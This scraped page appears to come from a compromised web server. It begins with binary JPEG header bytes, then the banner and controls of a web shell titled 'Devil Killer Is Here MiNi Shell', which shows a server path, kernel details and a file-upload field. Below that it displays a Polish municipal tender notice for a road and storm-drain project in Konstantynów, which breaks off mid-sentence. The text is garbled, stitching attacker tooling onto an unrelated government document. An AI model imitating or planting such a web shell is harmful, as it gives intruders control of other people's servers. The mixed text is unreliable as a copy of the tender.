JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210722/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210722/0012383901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00123839 z dnia 2021-07-22</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa drogi gminnej Nr 100044L na odcinku od km 0+838 do km 1+433,4 wraz z budową<br/>kanalizacji deszczowej z miejscowości Zakanale </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KONSTANTYNÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 030237581</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul.Kard. St. Wyszyńskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Konstantynów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-543</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL811 - Bialski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48833414192</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48833414192</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina.konstantynow@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">ugkonstantynow.bip.lubelskie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa drogi gminnej Nr 100044L na odcinku od km 0+838 do km 1+433,4 wraz z budową<br/>kanalizacji deszczowej z miejscowości Zakanale </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ae62f8a8-ead4-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00123839</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00044258/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa drogi gminnej Nr 100044L na odcinku od km 0+838 do km 1+433,4 wraz z budową kanalizacji deszczowej z miejscowości Zakanale</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ugkonstantynow.bip.lubelskie.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl,ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portaloraz<br/>poczty elektronicznej: gmina.konstantynow@gmail.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.11.4. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentówelektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Zasady<br/>składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne<br/>ich wysyłania opisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z<br/>ww. Instrukcją i postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie<br/>zamówienia w szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal<br/>wskazane w Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest<br/>dysponowanie przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet.<br/>Aplikacja działa tylko na platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania<br/>z urządzeń mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu miniPortal<br/>może byćograniczony. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i<br/>oznaczania czasu odbioru danych:- specyfikacja połączenia formularze udostępnione są za pomocą<br/>protokołu TLS 1.2,- format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie<br/>HTML z kodowaniem UTF-8,- oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje<br/>opierają się o czas serwera i dane zapisywane są z dokładnością co do setnej części sekundy,-<br/>integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP.<br/>W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego<br/>automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie<br/>Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane<br/>poświadczenia” jest zawarta informacja o dacie doręczenia.System dostępny jest za pośrednictwem<br/>następujących przeglądarek internetowych:- Microsoft Internet Explorer od wersji 9.0,- Mozilla Firefox<br/>od wersji 15,- Google Chrome od wersji 20.11.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”<br/>i „Formularza do komunikacji” wynosi 150 MB. 11.6. Za datę przekazania oferty, wniosków,<br/>zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.11.7. Zamawiający<br/>przekazuje identyfikator postępowania na miniPortalu jako załącznik Nr 9 do SWZ. Dane postępowanie<br/>można wyszukać również na Liście wszystkich postępowań w miniPortalu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: 1) Jest administratorem danych<br/>osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;2)<br/>dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.: „Budowa drogi<br/>gminnej nr 100019L na odcinku od km 2+620.0 do km 3+390.0 w miejscowości Zakalinki”<br/>prowadzonym w trybie podstawowym;3) odbiorcami danych osobowych Wykonawcy będą osoby lub<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn.<br/>zm.), dalej „ustawa Pzp”; 4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1<br/>ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób<br/>gwarantujący jego nienaruszalność.5) obowiązek podania przez Wykonawcę danych osobowych<br/>bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp; 6) w odniesieniu do danych osobowych<br/>Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO;7) Wykonawca posiada:− na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>dotyczących Wykonawcy;− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o<br/>ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności<br/>protokołu oraz jego załączników;− na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8) Wykonawcy nie przysługuje:− w związku z art. 17 ust. 3<br/>lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych<br/>Wykonawcy jest art. 6 ust. 1 lit. c RODO. W przypadku, gdy wykonanie obowiązków, o których mowa w<br/>art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający<br/>może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia<br/>do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia<br/>2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.W<br/>przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień<br/>Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w<br/>drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.10.2021.EK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Budowa drogi gminnej Nr 100044L na odcinku od km 0+838 do km 1+433,4 wraz z budową<br/>kanalizacji deszczowej z miejscowości Zakanale”. 4.2. Zakres robót obejmuje w szczególności:<br/> roboty rozbiórkowe (roboty pomiarowe, ścinka drzew, mechaniczne karczowanie pni, rozbiórka<br/>nawierzchni betonowej, rozbiórka krawężników, rozbiórka przepustów),<br/> wykonanie przepustów z rur HDPE średnicy 60 i 40 cm<br/> ustawienie krawężników betonowych na ławie betonowej -1215 m<br/> wykonanie warstwy ulepszonego podłoża z gruntu stabilizowanego spoiwem hydraulicznym o<br/>grubości 31 cm - 3537 m2<br/> wykonanie podbudowy z kruszywa łamanego o ciągłym uziarnieniu (0-31,5)<br/>o grubości warstwy 20 cm i pow. 3175 m2,<br/> wykonanie warstwy wiążącej z betonu asfaltowego AC-16W, grubość warstwy po zagęszczeniu<br/>5 cm – o pow. 3175 m2<br/> spryskanie warstwy wiążącej emulsją asfaltową,<br/> wykonanie warstwy ścieralnej z betonu asfaltowego AC 11S m o grubości warstwy po<br/>zagęszczeniu 4 cm, o pow. 3996,3 m2.<br/> wykonanie zjazdów o nawierzchni z kruszywa łamanego, o pow. 365,8 m2<br/> oznakowanie,<br/> przebudowa linii kablowej NN (usunięcie kolizji)<br/> przebudowa gazociągu<br/> przesunięcie hydrantów ppoż.<br/> kanalizacja deszczowa<br/> zahumusować i obsiać mieszanką traw pobocza i skarpy<br/>W zakres zamówienia wchodzi tez wykonanie powykonawczej inwentaryzacji geodezyjnej . 4.4.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 1 do SWZ. Składają się<br/>na niego następujące dokumenty:<br/>1) dokumentacja projektowa w tym projekt budowlany i projekt stałej organizacji ruchu,<br/>2) Specyfikacje techniczne wykonania i odbioru robót budowlanych (STWiORB),<br/>3) Przedmiar robót,<br/>Z uwagi na to, że wynagrodzenie Wykonawcy wskazane w ofercie będzie miało charakter<br/>ryczałtowy, Wykonawca przy wycenie oferty powinien opierać się na zakresie wskazanym w dokumentacji projektowej, o której mowa w pkt 4.4.1) oraz STWIORB. Przedmiar robót ma<br/>charakter pomocniczy. Wystąpienie w trakcie realizacji umowy robót nieujętych w przedmiarze<br/>lub robót w większej ilości w stosunku do przyjętej w przedmiarze nie będzie uprawniało<br/>Wykonawcy do żądania dodatkowego wynagrodzenia - jeżeli roboty te ujęte były w dokumentacji projektowej, o której mowa w pkt 4.4 1) oraz STWIORB. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45231220-3 - Roboty budowlane w zakresie gazociągów</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1 Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert: 1. Cena (C)- 60 % = 60 pkt. 2. Długość okresu<br/>gwarancji jakości na wykonane roboty budowlane oraz dostarczone i wbudowane materiały (G)- 40%<br/>=40 pkt. Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów<br/>oceny ofert, przyjmując zasadę, że 1% = 1 punkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości na wykonane roboty budowlane oraz dostarczone i wbudowane materiały</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące: postępowaniu<br/>6.1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.3. sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie<br/>6.1.4 zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>1) Wykonawca winien wykazać, że wykonał należycie nie wcześniej niż<br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/>co najmniej dwie roboty budowlane, z których każda polegała na budowie lub przebudowie drogi<br/>o nawierzchni z betonu asfaltowego - o powierzchni minimum 3000 m2.<br/>2) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą<br/>dysponować w okresie wykonywania zamówienia i skierują do jego realizacji:<br/>a) min. jedną osobę (która będzie pełnić funkcję kierownika budowy) posiadającą uprawnienia<br/>budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej w<br/>zakresie objętym przedmiotem zamówienia lub odpowiadające im równoważne uprawnienia<br/>budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku<br/>Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do<br/>wyżej wskazanych.<br/>b) min. jedną osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych, wodociągowych i<br/>kanalizacyjnych w zakresie objętym przedmiotem zamówienia lub odpowiadające im<br/>równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących<br/>przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania<br/>robotami równoważne do wyżej wskazanych.<br/>c) min. jedną osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektroenergetycznych w<br/>zakresie objętym przedmiotem zamówienia lub odpowiadające im równoważne uprawnienia<br/>budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku<br/>Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do<br/>wyżej wskazanych. DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW UDZIAŁU W<br/>POSTĘPOWANIU:1)<br/>Wykonawca powinien w wykazie robót wyraźnie określić zakres robót (w tym powierzchnia i<br/>rodzaj nawierzchni), aby można było ustalić, czy spełnia warunek udziału w postępowaniu.2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub korzystania z zasobów podmiotów trzecich na podstawie art. 118 ust. 1 ustawy Pzp minimum jeden<br/>Wykonawca lub jeden podmiot udostępniający zasoby musi posiadać pełne doświadczenie<br/>wskazane w ww. warunku udziału w postępowaniu – pkt 6.1.4, ppkt 1) SWZ.3) Przez posiadanie<br/>uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji<br/>zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w<br/>rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. 2020 r, poz. 1333<br/>z późn. zm.) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne w budownictwie<br/>(nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi<br/>nadawanie uprawnień budowlanych w dacie ich nadania.4) Wykonawca w celu wykazania<br/>spełniania warunków określonych w pkt 6.1.4, ppkt 2) SWZ może wskazać osobę będącą<br/>obywatelem państwa członkowskiego UE, która nabyła kwalifikacje zawodowe do 